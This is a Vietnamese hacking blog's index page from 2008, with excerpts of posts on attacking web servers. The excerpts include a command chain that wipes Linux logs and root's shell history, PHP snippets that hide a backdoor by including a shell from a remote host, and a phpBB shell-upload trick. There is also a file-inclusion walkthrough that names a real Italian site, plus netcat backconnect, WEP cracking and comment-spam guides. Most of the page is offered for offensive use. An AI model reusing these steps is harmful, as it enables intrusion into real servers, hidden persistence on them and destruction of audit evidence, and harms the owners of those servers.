Portfolio
My Blog

Xóa log (linux, unix)

June 10, 2008Category : Bug & Security

rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history..

Read more
01.

Combine local inclusion_HTTP Header_access logging

June 10, 2008Category : Bug & Security

Combine “local inclusion + HTTP Header + access logging” attack /————————————————— Mục tiêu: Server Mức độ nguy hiểm: khá cao Mức độ phổ biến: có lẽ ko nhiều :-p —————————————————/ I ) Sơ lượt: Thông thường các web service thường có thêm chức năng ghi lại “nhật kí truy cập” của người dùng. Chức năng..

Read more
02.

Hack Local với shell cgi-telnet.pl

June 10, 2008Category : Bug & Security

Điều kiện cần : +Bạn cần phải up 1 file view.pl ( cgi-telnet.pl ) lên host mình để hack, chmod 775 nhé ! + Các lệnh để hack : ls -al : lệnh này để xem thông tin cd : lệnh này dùng để chuyển thư mục Cat : lệnh này dùng để xem info..

Read more
03.

include shell với phpBB

June 10, 2008Category : Bug & Security

phpBB version : 2.0.9 chuẩn bị sẵn 1 con shell upload shell txt lên host nào đó chèn đoạn code sau vào notepad roài save với đuôi .gif <php include “http://link…/shell.txt”; ?> khi ta đã vào dc admincp của phpBB chuyển tới config … chọn cho upload avatar = Yes Sau đó backup lại database..

Read more
04.

1 số cách bypass safemode

June 10, 2008Category : Bug & Security

1.bypass Safe-Mode qua cgitelnet.pl giả dụ bật Safe-Mode, dis khá nhiều các hàm quan trọng show_source, dl, exec, shell_exec, system, popen, pclose, proc_open, proc_close, passthru, virtual, leak, chgrp, ini_alter, ini_restore Command lệnh của con shell vì thế ko hiện đc luôn Nhưng nhìn kĩ lại ta thấy uid=betalocal , vậy thì mặc cha nó ta..

Read more
05.

Khai thác shell r57

June 10, 2008Category : Bug & Security

Phần 1: Cơ bản về R57 I. Cơ bản về r57. 1. Các thông tin ta có thể thấy đc qua shell. Đầu tiên khi nhìn vào r57 các bạn sẽ thấy những dòng trên cùng kiểu như thế này: – Safe-mode: On => Đây là chức năng bảo mật bật. Cái này chỉ có..

Read more
06.

IDS – IPS – IDP đôi điều cần biết

June 10, 2008Category : IT & Network

IPS đôi điều cần biết ——————————————————————————– Hệ thống ngăn chặn xâm nhập IPS – Bảo vệ chống xâm nhập và phân tích biến cố IPS – Intrusion Prevention System Có 3 lý do để người ta xem xét sử dụng hệ thống ngăn chặn xâm nhập: – Cung cấp khả năng điều khiển truy cập..

Read more
07.

Hướng dẫn sử dụng metasploit

June 10, 2008Category : Bug & Security

1) Giới thiệu Metasploit Framework là một môi trường dùng để kiểm tra ,tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python.Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows,..

Read more
08.

Cách check version các loại forum

June 10, 2008Category : Bug & Security

với IBF www.server.com/forum/index.php?ipscheck=1&key=ipscheck$1@@ Between the <version_string></version_string> tags. PHPBB www.server.com/forum/docs/CHANGELOG.html Left, add 1 to the latest ‘Changes since’ version. _______________________ eg: 1. Changelog i. Changes since 2.0.19 Would mean the phpbb version would be 2.0.20 vbulletin http://www.server.com/forum/clientscript/vbulletin_global.js

Read more
09.

Up shell ở IPB, VBB

June 10, 2008Category : Bug & Security

+IPB:Thằng này hiện tại tớ có 3 cách up shell Cách 1: Cách này rất đơn giản cứ vào trong phần Style manager coi phần Emoticons rồi cứ up con shell php lên là được. Tuy nhiên cách này có hạn chế là đối với các ver >=2.1.7 ko làm được bới vì nó check..

Read more
010.

Local File Inclusion

June 10, 2008Category : Bug & Security

Google gõ keyword: allinurl: “download.asp?file=” allinurl: “dl.asp?file=” ra hàng loạt , lấy thằng này làm ví dụ nhé . http://www.provincia.so.it/download.asp?file= thêm default.asp vào http://www.provincia.so.it/download.asp?file=default.asp down cái file đó về mở ra thấy <!–#INCLUDE VIRTUAL=”/include/connettiDB.asp”–> thay tiếp vào đường dẫn vào http://www.provincia.so.it/download.asp?file=include/connettiDB.asp ồi tiếp tục down cái file đó về mở ra thấy percorsoDatabase=”/database/DBSito.mdb giờ thì..

Read more
011.

Ẩn backdoor, shell

June 10, 2008Category : Bug & Security

Dùng include if ($_REQUEST[‘go’]==”backdoor”) { include (“http://link.com/remview.php”); } hehe ! vậy khi nào cần dùng đến site này ta chỉ việc type lên file index.php của nó là : index.php?go=backdoor

Read more
012.

Hướng dẫn sử dụng Netcat

June 10, 2008Category : Bug & Security

============================ -==Hướng dẫn sử dụng Netcat==- ============================ 1. Giới thiệu Netcat là một công cụ không thể thiếu được nếu bạn muốn hack một website nào đó. +Bạn có thể dùng netcat (nc) backconnect từ máy victim (máy chứa website) về máy mình +Hoặc đặt netcat lắng nghe trên 1 port của máy mình ,..

Read more
013.

Phân loại các kiểu SQL Injection !

June 10, 2008Category : Bug & Security

1. SQL Injection : – Cái này nói đến những cái lỗi thuộc về câu lệnh truy vấn SQL trực tiếp vào database và ta CÓ THỂ NHÌN THẤY ĐƯỢC. 2. Blind SQL Injection : – Ám chỉ những lỗi truy vấn đi sâu vào trong mệnh đề logic với database, tất nhiên là LOGIC..

Read more
014.

Spam Comment blog 360 yahoo

June 10, 2008Category : Bug & Security

Chú ý: +Có 1 acc nick yahoo đã làm blog , và có quyền comment trên blog của victim + Nhớ set “max_execution_time” [php.ini] của localhost thành 9999 + Sửa $cookie_file_path cho phù hợp [Cả 2 file] + Nhớ ko up lên host nhé , host thì nó làm việc nhanh thật 1s/1 comment nhưng..

Read more
015.

Hack mạng Wireless ( Crack WEP Key )

June 10, 2008Category : Bug & Security

-Đầu tiên các bạn khởi động vào linux với quyền root -Chạy Shell Sau đó gõ vào show-wireless-interface.sh ở đây sau khi nhấn enter máy sẽ báo là có 1 thiết bị mạng ko dây ở đây là wlan0 -Vì fat dùng Kismet để scan mạng nên đầu tiên fat kiểm tra xem file config..

Read more
016.
© Oliver / All rights reserved.
To top